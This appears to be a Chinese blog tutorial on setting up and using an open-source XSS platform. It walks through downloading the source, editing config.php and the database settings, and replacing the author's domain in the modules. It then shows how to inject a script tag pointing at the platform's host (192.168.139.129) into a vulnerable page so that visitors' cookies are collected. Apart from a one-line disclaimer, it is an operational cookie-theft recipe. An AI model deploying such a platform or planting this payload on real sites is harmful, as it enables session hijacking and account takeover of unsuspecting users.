一、下载平台源码、拷贝到我们网站的根目录

https://github.com/anwilx/xss_platform

二、修改相关参数

1、config.php，数据库用户、密码、还有xss平台的访问路径

2、导入sql文件，测试的时候没法导入，所以就手动创建了数据库

新建数据库

打开xssplatform.sql，将里面的sql语句执行一遍

3、更新站点域名，将作者的域名替换，一共有四处

将module模块里"http://xsser.me"替换为"http://www.aiyouxss.com/xss");

4、修改authtest文件

三、平台利用

1、注册一个账户

2、创建一个项目

3、配置相关信息，根据需要，添加模块

4、复制script里面代码，插入到存在xss漏洞的页面

<script src=http://192.168.139.129/xss/E3vbsa></script>

5、打开xss平台，已获取对方cookie

禁止非法，后果自负